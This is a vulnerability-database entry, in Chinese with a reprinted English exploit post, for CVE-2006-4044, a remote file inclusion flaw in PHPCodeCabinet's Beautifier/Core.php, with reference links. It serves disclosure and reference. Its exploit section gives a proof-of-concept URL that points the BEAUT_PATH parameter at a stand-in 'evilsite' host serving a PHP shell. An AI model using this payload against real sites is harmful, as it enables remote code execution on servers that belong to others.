PHPCodeCabinet Core.PHP程序远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110755 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-08-14
CVE编号 CVE-2006-4044 CNNVD-ID CNNVD-200608-163
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2139
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-163
|漏洞详情
BradFearsphpCodeCabinet0.5早期版本的Beautifier/Core.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助BEAUT_PATH参数中的URL执行任意PHP代码。
|漏洞EXP
>From Minion:

PHPCodeCabinet (all versions) is vulnerable to a remote file include.

The vulnerable code is in /include/Beautifier/Core.php

an $BEAUT_PATH Was not properly scrubbed, so they got owned.

Proof of concept:

http://target/phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php

HFile.php would be your php shell.

Shouts to XoRcrew & Disruptiv.

# milw0rm.com [2006-08-07]
|参考资料

来源:BID
名称:19359
链接:http://www.securityfocus.com/bid/19359
来源:VUPEN
名称:ADV-2006-3168
链接:http://www.frsirt.com/english/advisories/2006/3168
来源:SECUNIA
名称:21386
链接:http://secunia.com/advisories/21386
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/PHPCabinetRFIAugust052006.html
来源:FULLDISC
名称:20060804PHPCodeCabinetVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0146.html
来源:XF
名称:phpcodecabinet-core-file-include(28238)
链接:http://xforce.iss.net/xforce/xfdb/28238